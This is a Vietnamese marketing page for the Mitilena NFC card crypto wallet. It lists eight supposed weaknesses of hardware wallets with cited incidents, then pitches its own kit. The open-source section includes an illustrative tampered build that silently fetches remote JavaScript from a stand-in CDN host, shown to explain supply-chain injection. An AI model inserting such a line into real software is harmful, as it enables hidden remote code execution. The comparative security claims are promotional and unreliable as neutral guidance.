8 lỗ hổng Mã nguồn mở Checklist FAQ
Mitilena Mitilena Wallet Ví crypto lạnh
ONLINE · 22,000+ COINS Tạo víTạo
Ví phần cứng · lỗ hổng không rõ ràng

Lỗ hổng không rõ ràng của ví phần cứng

Bạn mua thiết bị để bịt lỗ. Lỗ mới đi kèm: firmware, cập nhật, dịch vụ trên máy tính, màn hình, hộp, tài khoản hãng. Tám chi tiết mà review gọi là ưu điểm — và tám cách tiền bị lấy qua chúng trong 2020–2026.

Vụ việc thật kèm ngày và số tiền Từ tài liệu nhà sản xuất Chúng tôi đo bộ kit của mình theo cùng danh sách
Cái giá của sai lầmvụ công khai
2026Coldcard · độ ngẫu nhiên yếu trong firmware$100M+
2025Bybit · người ký đã ký thứ họ không thấy$1.5B
2024Dark Skippy · seed rò qua hai chữ kýnghiên cứu
2023Ledger Connect Kit · cửa hậu trong thư viện$600K
2021App ví giả trên App Store17,1 BTC
2020Rò DB khách Ledger · phishing nhiều năm270.000 người
Tám lỗ hổng

Mỗi chi tiết review khen là một lỗ riêng

Ví phần cứng bịt một lỗ: khóa không còn nằm trên điện thoại có internet. Nhưng thiết bị không trống. Có firmware, cập nhật, chương trình desktop, màn hình, hộp, người bán nắm địa chỉ bạn — và mỗi chi tiết thêm bề mặt tấn công trước đây bạn không có. Dưới đây là tám chi tiết đó: review nói gì, tiền bị lấy thế nào, cách bịt lỗ, và bộ kit của chúng tôi có chi tiết đó không.

Lỗ hổng 01

Firmware tạo khóa của bạn

Trong review: «chip bảo mật — khóa được tạo trong thiết bị và không bao giờ rời khỏi»

Khóa là một số ngẫu nhiên khổng lồ, và firmware tạo ra nó. Một lỗi ở đó — và số khóa ít hơn bạn nghĩ rất nhiều: chúng bị vét cạn trên mọi chủ sở hữu cùng lúc, không cần đụng thiết bị, nhiều năm sau khi mua. Chip không quan trọng; lỗ nằm phía trên nó.

Sự cố
$100M+
Coldcard, tháng 7/2026: lỗi build firmware từ 2021 lặng lẽ thay RNG phần cứng bằng bản yếu, seed từ serial thiết bị và timer. Độ mạnh khóa rơi còn khoảng 40 bit; hơn 5.000 địa chỉ bị rút sạch.
Cách bịt lỗ
Bạn có thể mang độ ngẫu nhiên của mình: đổ xúc xắc, cụm từ riêng. Ví nhận entropy từ bạn thì không phụ thuộc một lỗi firmware duy nhất.
Chúng tôi không có chi tiết này
Trên thẻ không có firmware — đó là vật mang đã mã hóa. Mitilena Air tạo khóa từ RNG hệ thống của thiết bị, và bạn có thể đặt cụm seed riêng thay vì các từ ngẫu nhiên.
Lỗ hổng 02

Các bản cập nhật buộc bạn phải cài

Trong review: «hãng thường xuyên gửi bản cập nhật bảo mật»

Mỗi lần cập nhật là lúc firmware có thể bị đổi. Firmware bị can thiệp giấu mảnh seed trong hai–ba chữ ký bình thường trong khi thiết bị nhìn ngoài vẫn ổn. Bỏ cập nhật cũng không được: lỗ được vá đúng bằng những bản cập nhật đó.

Sự cố
2 signatures
Dark Skippy, tháng 8/2024: nhà nghiên cứu chỉ ra firmware ví phần cứng độc hại có thể rút cả seed qua hai giao dịch. Một bản cập nhật từ chỗ sai là đủ.
Cách bịt lỗ
Firmware đến từ đâu và thiết bị có xác minh chữ ký của nó không. Tốt nhất là khi chẳng có gì để cập nhật.
Chúng tôi không có chi tiết này
Trên thẻ không có gì để cập nhật hay đổi. Việc ký diễn ra trong app điện thoại; bản build được ký và đến từ App Store cùng Google Play — như mọi app bạn tự thấy và tự đóng.
Lỗ hổng 03 · Cảm nhận sự vô lý
Trong review: «app desktop tiện của hãng»

Ví dành cho sự nghi ngờ lại đi kèm dịch vụ chạy nền

Bạn mua thiết bị vì một lý do: thôi tin máy tính. Để nó chạy, bạn phải cài dịch vụ nền trên chính máy đó. Bạn không viết nó, không khởi động nó, và không kiểm soát nó: nó chạy cùng OS, lắng nghe cổng mà mọi chương trình trên máy đều gọi được, và đang làm gì đó ngay lúc này — chính xác là gì, bạn không biết và sẽ không bao giờ kiểm chứng được.

Nó vẫn chạy nền sau khi bạn đóng ví. Nhiều năm. Ở một trong những hãng lớn nhất đó là dịch vụ «bridge» riêng; năm 2025 họ giấu nó vào trong app — dịch vụ vẫn còn, chỉ chết cùng cửa sổ. Với hầu hết hãng khác, không có chương trình desktop thì thiết bị chỉ là móc khóa. Trên Linux phải thêm quy tắc udev nếu không hệ thống sẽ không nhả USB.

Vậy thứ bạn mua để thôi phụ thuộc chương trình máy tính lại không chạy được nếu thiếu một chương trình máy tính. Và không phải cái bạn thấy — mà cái chạy bên dưới nó.

Chúng tôi không có chi tiết này
Không cài gì trên máy tính: không dịch vụ, không driver, không cổng. Trung gian là chip NFC sẵn có trong điện thoại, do nhà sản xuất điện thoại làm và do OS quản: chỉ hoạt động khi app mở và chính bạn chạm thẻ, và điện thoại hỏi quyền mỗi lần. Thẻ thụ động: không pin, không radio, tự nó không làm gì. Đóng app — không còn gì chạy khi bạn không có mặt. Thành thật: vẫn cần app điện thoại, và nó như mọi app khác — bạn thấy, mở, và tự đóng. Không ai sống trong kho tiện ích.
Trình giám sát hệ thốngWALLET CLOSED
Tiến trìnhTrạng tháiThời gian chạy
HW Wallet Appwallet
bạn đã đóng-
hwwalletddịch vụ nền · cầu USB
đang chạy412d 06:14
hệ thống khởi động lúc đăng nhậpkhông đóng được — đó là dịch vụ
Mockup; tên mang tính minh họa. Đây là máy tính với một trong những ví USB phổ biến nhất trước 2025; sau đó «bridge» được đưa vào trong app — cùng dịch vụ, chỉ không còn hiện trong danh sách.
Ẩn dụ
Ngôi nhà vì riêng tư — và người thuê trong kho tiện ích

Bạn muốn ngôi nhà vì riêng tư. Bạn mua. Rồi cần bảo vệ — cài. Và để gói bảo vệ chạy, họ bảo bạn cho một người mặc đồng phục vào nhà, sống trong kho tiện ích suốt ngày đêm, cầm chìa mọi cửa, và báo cáo cho người khác. Bạn không thuê anh ta, không sa thải được, và ban đêm anh làm gì — bạn không biết.

Anh ta «là người của chúng tôi», tất nhiên. Hợp đồng ghi vậy. Bạn muốn riêng tư và nhận được bản thay thế: ngôi nhà với người thuê bạn không chọn.

Lỗ hổng 04 · Mã nguồn mở không phải kiểm toán
Trong review: «mã nguồn mở — ai cũng kiểm tra được»

Mã nguồn mở là cách lập trình viên làm việc cùng nhau, không phải huy hiệu rằng chương trình không ăn cắp

Mã nguồn mở ra đời để mọi người chia sẻ chương trình và sửa cùng nhau. Là công cụ cộng tác thì tuyệt. Nó chưa bao giờ là con dấu chất lượng kiểu «phần mềm này sẽ không lấy tiền bạn», và đây là lý do: bạn không dùng mã nguồn. Bạn dùng thứ đã tải về.

Giữa repo GitHub và file trên điện thoại có bản build, app store, cập nhật, server. Ở bất kỳ bước nào một dòng có thể lọt vào mã, kéo bất cứ thứ gì từ bất cứ đâu — và sẽ không có trong repo. Bạn không so được bản của mình với nguồn: store giao file đã biên dịch; ví web nhận đúng mã server chọn phục vụ hôm nay; tiện ích trình duyệt cập nhật thầm lặng ban đêm.

«Mở» nghĩa là một số người có thể kiểm một phiên bản nào đó vào một ngày nào đó. Bản của bạn đang làm gì lúc này — nó không nói điều đó.

Trong repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Trên điện thoại · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Một dòng trong bản build. Không có trong repo, store không thấy, đang chạy trên thiết bị bạn.
Tính mở không ngăn được bất kỳ vụ nào dưới đây
Ledger Connect Kit2023
thư viện mở trên GitHub; bản độc hại đẩy lên npm; hàng chục site tải bản live trong vài giờ
Copay / event-stream2018
ví mở; cửa hậu đi qua dependency nhắm đúng nó
xz utils2024
mở hai mươi năm; cửa hậu nằm trong bản phát hành đến khi một kỹ sư nhận ra đăng nhập SSH chậm thêm nửa giây
Coldcard2026
firmware mã nguồn mở; lỗi build năm năm thay RNG phần cứng bằng bản yếu — khóa bị vét không cần đụng thiết bị, hơn 5.000 địa chỉ, $100M+
Cái thực sự có tác dụng
Không phải đọc mã của người khác — hai kiểm tra ai cũng làm được. Một, kiểm toán hành vi: đặt proxy chặn trên máy, đưa app qua nó, xem nó gửi gì đi đâu. Không cần đọc mã — traffic hiện hết. Hai, kiến trúc nơi mã chẳng có gì để lấy: nếu khóa không bao giờ nằm trên thiết bị có mạng, mọi dòng trong mọi bản cập nhật đều bất lực — chẳng có gì để gửi.
Chúng tôi làm thế nào
Chúng tôi tự đưa cái thứ nhất: chạy app qua proxy, bản web qua DevTools trình duyệt, soi từng request. Khóa ký và seed sẽ không xuất hiện; ngoại lệ duy nhất là Monero view key — nói trên trang «chuyển khoản đi thế nào». Cái thứ hai nằm trong kit: khóa sinh ra trong Mitilena Air trên thiết bị không internet, sống trên thẻ, và chỉ chữ ký tới app online — ở đó chẳng còn gì để proxy. Và offline ở đây là thật: chế độ air-gap thì thiết bị khóa không nối gì — không cáp, không Bluetooth; giao dịch vào và ra bằng mã QR bạn nhìn bằng mắt. Không phải ví «lạnh» treo cáp vào máy online với dịch vụ riêng trao đổi ai-biết-cái-gì.
Lỗ hổng 05

Màn hình không cho thấy bạn đang ký gì

Trong review: «xác nhận trên màn hình thiết bị — virus trên máy tính bất lực»

Màn hình nhỏ, và thường hiện hash hoặc «contract call», không phải địa chỉ và số tiền. Bạn xác nhận thứ không thấy — và chữ ký vẫn thành thật, vẫn của bạn. Màn hình tạo cảm giác kiểm soát mà thực ra không có.

Sự cố
$1.5B
Bybit, tháng 2/2025: người ký dùng ví phần cứng đã xác nhận một chuyển khoản trông bình thường trên UI. Thiết bị hiện dữ liệu con người không kiểm chứng được.
Cách bịt lỗ
Người nhận, số tiền và loại thao tác bằng ngôn ngữ con người — không phải hash — và nút từ chối một lần nhấn.
Chúng tôi làm thế nào
Có màn hình, nhưng là màn hình điện thoại: địa chỉ, số tiền và loại yêu cầu bằng chữ — chuyển khoản, gọi hợp đồng, phê duyệt — và nút Từ chối. Với số lớn — thiết bị offline riêng nhận cả giao dịch.
Lỗ hổng 06

Hộp đã sẵn có seed

Trong review: «giao trong hộp niêm phong kèm tem bảo mật»

Thiết bị vật lý nghĩa là vận chuyển, trung gian và sàn «giảm giá». Ví tới đã cấu hình sẵn, seed trên tờ giấy trong hộp. Hoặc app giả trên store bảo bạn «nhập seed để kích hoạt».

Sự cố
17,1 BTC
App Store, 2021: chủ ví phần cứng nhập seed vào app giả và mất 17,1 BTC. Cùng năm, sau rò DB, khách Ledger nhận thiết bị giả kèm thư «chuyển seed sang máy mới».
Cách bịt lỗ
Tự khởi tạo và đừng bao giờ dùng seed đã viết sẵn khi tới. Tem không phải kiểm chứng; kiểm chứng là bạn tạo khóa.
Chúng tôi làm thế nào
Thẻ tới trống: bạn tạo khóa và tự ghi — trong hộp không thể có seed sẵn. App chỉ từ App Store và Google Play qua link trên site; chỉ hỏi seed khi nhập và khi ký.
Lỗ hổng 07

Tài khoản nhà bán

Trong review: «bảo hành chính hãng, hỗ trợ và tài khoản cá nhân»

Để mua thiết bị bạn đưa hãng tên, email và địa chỉ giao hàng. Bảo mật của bạn giờ phụ thuộc database của họ. Nếu rò — nhiều năm bạn sẽ nhận tin «xác nhận seed trên thiết bị mới», đôi khi kèm kiện hàng.

Sự cố
270.000 người
Ledger, 2020: dữ liệu 270.000 người mua bị rò, gồm địa chỉ bưu điện. Email, cuộc gọi và kiện hàng bảo «migrate» seed vẫn còn tới nay.
Cách bịt lỗ
Họ biết về bạn càng ít, vector càng ngắn: mua không cần tài khoản, hỗ trợ không bao giờ hỏi seed, và quy tắc «chỉ kẻ trộm mới hỏi seed».
Chúng tôi không có chi tiết này
Ví chạy không cần đăng ký — không tài khoản. Người bán chỉ biết địa chỉ giao hàng. Không hỗ trợ lẫn app hỏi seed.
Lỗ hổng 08

Một thiết bị và một tờ giấy

Trong review: «vỏ chắc, màn lớn, pin cả tuần»

Càng nhiều linh kiện càng dễ hỏng: cổng, màn, pin. Khôi phục treo vào một tờ seed — ướt, mất lúc chuyển nhà, chụp «phòng khi». Nguyên nhân mất phổ biến nhất không phải hack.

Sự cố
≈20 % BTC
Chainalysis ước khoảng một phần năm bitcoin mất vĩnh viễn — chủ yếu vì mất khóa, không phải hack.
Cách bịt lỗ
Trong hộp có bao nhiêu bản sao khóa và dạng gì, mất thiết bị thì sao, và trong đó có gì có thể hỏng không.
Chúng tôi không có chi tiết này
Không màn, pin hay cổng — chẳng có gì để hỏng. Và không chỉ một bản: năm bản gương trong hộp — hai thẻ NFC và ba sticker ẩn trong nhựa chống nước, bền 10+ năm.
Checklist

Những gì không nên có trong ví

Tám chi tiết cho tám lỗ hổng. Danh sách áp dụng mọi ví — phần cứng, mobile, trình duyệt. Đánh dấu cái bạn đang chọn có — và cả của chúng tôi.

01
Khóa chỉ do phần mềm tạokhông có độ ngẫu nhiên của bạn — cụm từ hoặc xúc xắc
02
Cập nhật nơi khóa đang sốngmỗi lần cập nhật là cơ hội đổi mã
03
Dịch vụ, driver hoặc cổng trên máy tínhxem lỗ hổng 03
04
Huy hiệu «mã nguồn mở» thay vì kiến trúckhóa nằm nơi mã lạ có thể với tới
05
Màn hiện hash thay vì địa chỉ và số tiềnvà không có nút Từ chối
06
Seed đã viết sẵn khi tớitrong hộp, trong thư, trong «app kích hoạt»
07
Tài khoản nhà bánvà hỗ trợ có thể hỏi seed
08
Một bản sao duy nhất và linh kiện dễ hỏngmàn, pin, cổng, một tờ giấy
Trên danh sách này, bộ Ultimate không có cả tám chi tiết. Trong hộp: 2 thẻ NFC và 3 sticker ẩn, Mitilena Air (khóa không internet) và Mitilena Keys (ký không internet). Thẻ tới trống: bạn tạo và mã hóa khóa — không phải chip nhà máy. Nội dung và giá →
Ultimate · bộ kit offline

Không phải «chip bảo mật» nhà máy — vật mang do bạn mã hóa

Thẻ tới trống. Bạn tạo khóa trong Mitilena Air trên điện thoại không internet và tự ghi. Ký qua Mitilena Keys, cũng offline: giao dịch đi bằng QR. Năm bản giống nhau trong hộp: 2 thẻ NFC và 3 sticker ẩn trong nhựa chống nước. 18 mạng, hơn 20.000 coin, gồm USDT.

Không cài gì trên máy tính
Không firmware, cập nhật, màn hình hay pin
Giao dịch tới điện thoại offline — bằng âm thanh hoặc QR, không cáp hay USB
Chạy với app Mitilena miễn phí trên điện thoại
Nhựa chống nước, tuổi thọ kệ 10+ năm
Giao hàng toàn cầu · mitilena-store.com
Thẻ NFC Mitilena
Ultimate · tạo và ký offline
€369€439
2 thẻ NFC · 3 sticker ẩn · Mitilena Air · giấy phép Mitilena Keys
Mua Ultimate · €369 Basic và Premium — xem mọi gói
FAQ

Người ta hỏi gì sau khi đọc tới đây

Ưu nhược điểm ví phần cứng — bản ngắn?

Một ưu điểm lớn: khóa không nằm trên điện thoại có internet. Nhược điểm là tám chi tiết trên — mỗi cái thêm bề mặt tấn công. Ví phần cứng tốt là cái có ít chi tiết hơn, không phải nhiều hơn.

Nếu điện thoại bị xâm nhập thì sao?

Với thẻ trên điện thoại chính, khóa xuất hiện trong môi trường cô lập đúng giây ký — cùng rủi ro như mọi ví điện thoại, chỉ ngắn hơn. Với số tiền khiến bạn sợ — lớp thứ hai: ký trên thiết bị offline riêng, giao dịch tới bằng QR.

Nếu thẻ bị mất hoặc bị trộm thì sao?

Không có mật khẩu thì thẻ và sticker chỉ là nhựa vô dụng — khóa trên chúng đã mã hóa. Bản mất được thay bằng bốn bản còn lại: hai thẻ và ba sticker trong hộp là bản gương.

Có cần cập nhật firmware ví phần cứng không?

Nếu hãng vá một lỗ — có, và đúng lúc đó firmware có thể bị đổi: kiểm nguồn và chữ ký. Vật mang không firmware thì không có lựa chọn đó — chẳng có gì để cập nhật, chẳng có gì để đổi.

Khác ví USB thế nào?

Ít trung gian hơn: không cáp, driver, dịch vụ nền hay chương trình desktop. Một trung gian — chip NFC điện thoại bạn — và nó chịu trách nhiệm với bạn cùng OS, không phải hãng ví.

Mã nguồn mở nghĩa là an toàn?

Nghĩa là ai đó, lúc nào đó, kiểm được. Bạn không dùng mã mà dùng thứ đã tải, và không so được hai thứ đó. An toàn đến từ kiến trúc nơi khóa không nằm chỗ mã lạ với tới được.

Thẻ NFC với tạo và ký offline

Mua Ultimate · €369 Tạo ví miễn phí